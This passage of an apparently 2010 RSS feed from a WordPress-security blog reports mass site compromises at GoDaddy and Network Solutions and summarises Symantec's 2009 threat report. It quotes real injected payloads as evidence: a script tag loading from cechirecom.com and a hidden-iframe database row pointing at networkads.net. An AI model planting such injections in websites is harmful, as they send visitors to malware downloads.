<p class="addtoany_share_save_container">


    <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?sitename=WordPressSecured.com&amp;siteurl=http%3A%2F%2Fwww.wordpresssecured.com%2Fwpsecurity%2F&amp;linkname=PDF%20Exploits%20-%20A%20Hot%20Trend%20That%26%238217%3Bs%20Getting%20Worse&amp;linkurl=http%3A%2F%2Fwww.wordpresssecured.com%2Fwpsecurity%2Finternetsecurity%2Fpdf-exploits-a-hot-trend-thats-getting-worse%2F" target="_blank"><img src="http://www.wordpresssecured.com/wpsecurity/wp-content/plugdummy/add-to-any/share_save_120_16.gif" width="120" height="16" alt="Share/Save/Bookmark"/></a>



	</p>]]></content:encoded>
			<wfw:commentRss>http://www.wordpresssecured.com/wpsecurity/internetsecurity/pdf-exploits-a-hot-trend-thats-getting-worse/feed/</wfw:commentRss>
		<feedburner:origLink>http://www.wordpresssecured.com/wpsecurity/internetsecurity/pdf-exploits-a-hot-trend-thats-getting-worse/</feedburner:origLink></item>
		<item>
		<title>Godaddy: “Website Security Is Your Responsibility”</title>
		<link>http://feedproxy.google.com/~r/Wordpresssecuredcom/~3/dxdBLQo_oCQ/</link>
		<comments>http://www.wordpresssecured.com/wpsecurity/website-security/godaddy-website-security-is-your-responsibility/#comments</comments>
		<pubDate>Thu, 29 Apr 2010 02:12:44 +0000</pubDate>
		<dc:creator>Ken</dc:creator>
		
		<category><![CDATA[Website Security]]></category>

		<category><![CDATA[blog malware]]></category>

		<category><![CDATA[custom malware scripts]]></category>

		<category><![CDATA[Godaddy shared hosting]]></category>

		<category><![CDATA[Google Online Security Blog]]></category>

		<category><![CDATA[malware redirects]]></category>

		<category><![CDATA[php blog script hacked]]></category>

		<category><![CDATA[Wordpress blog security]]></category>

		<category><![CDATA[Wordpress security]]></category>

		<guid isPermaLink="false">http://www.wordpresssecured.com/wpsecurity/?p=165</guid>
		<description><![CDATA[Shared Server Blogs Hacked En Mass At Godaddy
Google&#8217;s Online Security Blog (August 2009):
Their malware list entries have more than doubled in a single year. In that time, they have seen as many as 40,000 websites compromised in one week. However they do admit this perceived increase may be due to improvements made in detection capabilities.
Another [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><strong>Shared Server Blogs Hacked En Mass At Godaddy</strong></p>
<p>Google&#8217;s Online Security Blog (August 2009):</p>
<p>Their malware list entries have more than doubled in a single year. In that time, they have seen as many as 40,000 websites compromised in one week. However they do admit this perceived increase may be due to improvements made in detection capabilities.</p>
<p>Another disturbing trend is many compromised web properties are pointing to hundreds of different source domains. The sources of attacks appear to be widening in scope.</p>
<p>But still&#8230; that&#8217;s a lot of malicious code and a lot of websites.</p>
<p>And just last weekend, Wordpress blogs hosted at Godaddy were hit with an interesting exploit that was not immediately detectable. Seems the malicious executable only kicked-in when traffic was referred from Google. So that made the exploit less obvious.</p>
<p>The exploit action consisted of a redirect and installation of malware on computers. Some bloggers found the code when they happened to be logged in as admin. The giveaway was an unusual effect on the Dashboard layout because the malware code interfered with the CSS loading.</p>
<p>In the view source mode, there was a script src redirect just above the &lt;/body&gt; tag in all the .php files. And the infected website will redirect to &#8220;burnvirusnow34.xorg.pl.&#8221;</p>
<p>But perhaps some mild relief is found in the fact that WP databases were not affected, only the actual .php files. And a backup install prior to April 23 will restore order to your blog&#8217;s world.</p>
<p><strong>However it is not known how the hackers are accessing the hosting accounts.</strong></p>
<p>Of course Godaddy has issued a statement regarding shared hosting security measures. But they have also stated, &#8220;The <em>compromise of your account is outside the scope of security that we provide for you.</em> Virus scans are performed&#8230; but they may not pick up everything&#8230; hackers tend to upload custom scripts which are not picked up by the traditional malware scanners.&#8221;</p>
<p>Then they make standard comments alluding to your responsibilities as a website owner.</p>
<p><em><strong>&#8220;The overall security of your password and the content within your account is your responsibility, as password compromises and compromises due to scripting can only be prevented by you.”</strong></em></p>
<p>A blogger posted the following at Wordpress&#8217;s site regarding last weekends Godaddy assault.</p>
<p>&#8220;My wordpress blog, hosted on a shared linux hosting account at Godaddy, has been hacked. The hacker injected a javascript malicious redirect into the footer of each page:</p>
<p>&lt;script src=&#8221;http://cechirecom.com/js.php&#8221;&gt;&lt;/script&gt;</p>
<p>I have temporarily restored an earlier install of my blog, which has got rid of the redirect, and I&#8217;ll probably do a clean install later.&#8221;</p>
<p class="addtoany_share_save_container">


    <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?sitename=WordPressSecured.com&amp;siteurl=http%3A%2F%2Fwww.wordpresssecured.com%2Fwpsecurity%2F&amp;linkname=Godaddy%3A%20%26%238220%3BWebsite%20Security%20Is%20Your%20Responsibility%26%238221%3B&amp;linkurl=http%3A%2F%2Fwww.wordpresssecured.com%2Fwpsecurity%2Fwebsite-security%2Fgodaddy-website-security-is-your-responsibility%2F" target="_blank"><img src="http://www.wordpresssecured.com/wpsecurity/wp-content/plugdummy/add-to-any/share_save_120_16.gif" width="120" height="16" alt="Share/Save/Bookmark"/></a>



	</p>]]></content:encoded>
			<wfw:commentRss>http://www.wordpresssecured.com/wpsecurity/website-security/godaddy-website-security-is-your-responsibility/feed/</wfw:commentRss>
		<feedburner:origLink>http://www.wordpresssecured.com/wpsecurity/website-security/godaddy-website-security-is-your-responsibility/</feedburner:origLink></item>
		<item>
		<title>Internet Security - Protect Your Business Assets</title>
		<link>http://feedproxy.google.com/~r/Wordpresssecuredcom/~3/0Mgo2yGtlAU/</link>
		<comments>http://www.wordpresssecured.com/wpsecurity/internetsecurity/internet-security-protect-your-business-assets/#comments</comments>
		<pubDate>Mon, 26 Apr 2010 22:20:22 +0000</pubDate>
		<dc:creator>Ken</dc:creator>
		
		<category><![CDATA[Internet Security]]></category>

		<category><![CDATA[antivirus]]></category>

		<category><![CDATA[browser attacks]]></category>

		<category><![CDATA[Internet Explorer security]]></category>

		<category><![CDATA[internet security]]></category>

		<category><![CDATA[internet security guidelines]]></category>

		<category><![CDATA[malicious code]]></category>

		<category><![CDATA[malware]]></category>

		<category><![CDATA[malware exploits]]></category>

		<category><![CDATA[pdf exploits]]></category>

		<category><![CDATA[Symantec Internet Security Threat Report]]></category>

		<category><![CDATA[threat protection]]></category>

		<category><![CDATA[web based attacks]]></category>

		<guid isPermaLink="false">http://www.wordpresssecured.com/wpsecurity/?p=151</guid>
		<description><![CDATA[Internet Security - What You Can Do To Protect Your Business
Symantec&#8217;s release of their Internet Security Threat Report reveals that in 2009, the greatest contributors for security threats were related to poor patches for existing security flaws.
Last year saw an increase in amount of malware created, as well as an ever-increasing level of sophistication and [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><strong>Internet Security - What You Can Do To Protect Your Business</strong></p>
<p>Symantec&#8217;s release of their Internet Security Threat Report reveals that in 2009, the greatest contributors for security threats were related to poor patches for existing security flaws.</p>
<p>Last year saw an increase in amount of malware created, as well as an ever-increasing level of sophistication and attack automation.</p>
<p>Surprisingly, the country with the greatest percentage of origins of attacks is the US.</p>
<p>Rank    Country            Percentage</p>
<p>1        United States    34%<br />
2        China                 7%<br />
3        Brazil                  4%<br />
4        U Kingdom        4%<br />
5        Russia               4%<br />
6        Germany            4%<br />
7        India                   3%<br />
8        Italy                     2%<br />
9        Netherlands      2%<br />
10      France                2%</p>
<p><strong>Top countries of origin for Web-based attacks  Source: Symantec</strong></p>
<p>Web based attacks seem to be the flavor du jour for the criminal elements. But interestingly, <em>PDF-based download exploits increased from 11% in 2008, to 49% in 2009.</em> The old warhorse, Internet Explorer, is still taking a beating as the second most attacked application, weighing-in at 18% of web-based hostility in 2009. Some things never end.</p>
<p>However, it&#8217;s important to note that browser exploits are definitely a preference among hackers.</p>
<p>Mozilla Fire Fox saw the <em>greatest increase</em> in new vulnerabilities, in 2009, with 169. Safari had 94 new vulnerabilities in 2009; Internet Explorer had 45; Chrome with 41 and Opera had 25.</p>
<p>The United States likes being number one, and it occupies that spot in several categories, unfortunately, in this report.</p>
<p>In 2009, the US ranked number one for:</p>
<p>1. Overall malicious activity.<br />
2. Sub-category: Malicious code<br />
3. Phishing hosts.<br />
4. Bots<br />
5. Origin of attack</p>
<p><em>And the US led the way with 19% of all malicious activity.</em> The number two country, China, came in at a distant 8%.</p>
<p><strong>Here are several security best practices guidelines quoted from Symantec:</strong></p>
<p>• Employ defense-in-depth strategies, which emphasize multiple, overlapping, and mutually supportive defensive systems to guard against single-point failures in any specific technology or protection method.<br />
This should include the deployment of regularly updated antivirus, firewalls, intrusion detection, and intrusion protection systems on client systems. Using a firewall can also prevent threats that send information back to the attacker from opening a communication channel.</p>
<p>• Administrators should update antivirus definitions regularly to protect against the high quantity of new malicious code threats and ensure that all desktop, laptop, and server computers are updated with all necessary security patches from their operating system vendor. IDS, IPS, and other behavior-blocking technologies should also be employed to prevent compromise by new threats.</p>
<p>• Always keep patch levels up to date, especially on computers that host public services and applications— such as HTTP , FTP, SMTP, and DNS servers—and that are accessible through a firewall or placed in a DMZ.</p>
<p>• Perform both ingress and egress filtering on all network traffic to ensure that malicious activity and unauthorized communications are not taking place.</p>
<p>• Consider using domain-level or email authentication in order to verify the actual origin of an email message to protect against phishers who are spoofing email domains.</p>
<p>• Configure mail servers to block or remove email that contains file attachments that are commonly used to spread viruses, such as .vbs, .bat, .exe, .pif, and .scr files.</p>
<p class="addtoany_share_save_container">


    <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?sitename=WordPressSecured.com&amp;siteurl=http%3A%2F%2Fwww.wordpresssecured.com%2Fwpsecurity%2F&amp;linkname=Internet%20Security%20-%20Protect%20Your%20Business%20Assets&amp;linkurl=http%3A%2F%2Fwww.wordpresssecured.com%2Fwpsecurity%2Finternetsecurity%2Finternet-security-protect-your-business-assets%2F" target="_blank"><img src="http://www.wordpresssecured.com/wpsecurity/wp-content/plugdummy/add-to-any/share_save_120_16.gif" width="120" height="16" alt="Share/Save/Bookmark"/></a>



	</p>]]></content:encoded>
			<wfw:commentRss>http://www.wordpresssecured.com/wpsecurity/internetsecurity/internet-security-protect-your-business-assets/feed/</wfw:commentRss>
		<feedburner:origLink>http://www.wordpresssecured.com/wpsecurity/internetsecurity/internet-security-protect-your-business-assets/</feedburner:origLink></item>
		<item>
		<title>Will A Back-Up Save Your Website or Blog After A Malware Attack?</title>
		<link>http://feedproxy.google.com/~r/Wordpresssecuredcom/~3/OEXI9AP3cv8/</link>
		<comments>http://www.wordpresssecured.com/wpsecurity/website-security/146/#comments</comments>
		<pubDate>Fri, 23 Apr 2010 05:38:49 +0000</pubDate>
		<dc:creator>Ken</dc:creator>
		
		<category><![CDATA[Website Security]]></category>

		<category><![CDATA[blog back up]]></category>

		<category><![CDATA[blog security]]></category>

		<category><![CDATA[iframe injection]]></category>

		<category><![CDATA[malware]]></category>

		<category><![CDATA[Network Solutions security attack]]></category>

		<category><![CDATA[security attack]]></category>

		<category><![CDATA[website back up]]></category>

		<guid isPermaLink="false">http://www.wordpresssecured.com/wpsecurity/?p=146</guid>
		<description><![CDATA[Will A Back-Up Save Your Website or Blog After A Malware Attack?
Some of you may have noticed the WF has been down all day. I’m not sure why, but it’s possibly related to a second security attack on Network Solutions’ database center. The first attack occurred on or about April 8, 2010 in which a [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><strong>Will A Back-Up Save Your Website or Blog After A Malware Attack?</strong></p>
<p>Some of you may have noticed the WF has been down all day. I’m not sure why, but it’s possibly related to a second security attack on Network Solutions’ database center. The first attack occurred on or about April 8, 2010 in which a mass infection of Wordpress blogs was sustained at the same Network Solutions location.</p>
<p>Here are the details of the April 8 event:</p>
<p>A large number of blogs running WP 2.9.2 were infected with malware. According to Network Solutions it seemed unrelated to themes or plugins, and some employed WP-admin access blocked to all but a few selected IP’s via htpasswd, as well. The sole similarity was all were shared hosts at Network Solutions. A Network Solutions spokesperson said all of their WP blogs were affected.</p>
<p>It appeared to be an SQL injection attack, or larger issues within Network Solution databases, for the following reasons:</p>
<p>No files were created so that would eliminate the advantages of the more common security measures. The April 8th attack modified the “siteurl” within the wp-option table to point to a particular url. Among other things, this would completely break the layout of the site.</p>
<p>Here’s the code found inside blog databases:</p>
<p><span style="font-size: 11.5pt; font-family: &quot;Trebuchet MS&quot;; color: #ff0000;">(2, 0, &#8217;siteurl&#8217;, &#8216;&lt;iframe style=\&#8221;display:none\&#8221; height=\&#8221;0\&#8221; width=\&#8221; 1\&#8221; src=\&#8221;http://networkads.net/grep/\&#8221;&gt;&lt;/iframe&gt;&#8217;, &#8216;yes&#8217;),</span></p>
<p>Network Solutions announced today’s attack is the second in two weeks. Of course they’re doing all they can to fix the issues.</p>
<p>This latest attack is widespread and impacts all sites: static HTML and blogs including Word Press and Joomla. These sites are being infected with iframe injections and encoded Javascript plus PDF exploits installed on certain sites. The encoded Javascript makes it possible for the iframe injection.</p>
<p>This seems to be an attack of wider scope and heightened degree of damage.</p>
<p>Part of the problem for many site owners results from many hosting companies maintaining their servers with Network Solutions. So don’t think your site could never be affected if an attack of this nature occurs on someone else’s property.</p>
<p>Network Solutions is now admitting this latest attack is happening at a deeper level. Their restoration attempts have sometimes caused malicious software to be restored because it was backed-up in their databases.</p>
<p>Related actions include Google announcing they are blacklisting as many affected sites as possible.</p>
<p>Tough day at Network Solutions.</p>
<p class="addtoany_share_save_container">


    <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?sitename=WordPressSecured.com&amp;siteurl=http%3A%2F%2Fwww.wordpresssecured.com%2Fwpsecurity%2F&amp;linkname=Will%20A%20Back-Up%20Save%20Your%20Website%20or%20Blog%20After%20A%20Malware%20Attack%3F&amp;linkurl=http%3A%2F%2Fwww.wordpresssecured.com%2Fwpsecurity%2Fwebsite-security%2F146%2F" target="_blank"><img src="http://www.wordpresssecured.com/wpsecurity/wp-content/plugdummy/add-to-any/share_save_120_16.gif" width="120" height="16" alt="Share/Save/Bookmark"/></a>



	</p>]]></content:encoded>
			<wfw:commentRss>http://www.wordpresssecured.com/wpsecurity/website-security/146/feed/</wfw:commentRss>
		<feedburner:origLink>http://www.wordpresssecured.com/wpsecurity/website-security/146/</feedburner:origLink></item>
	</channel>
</rss>
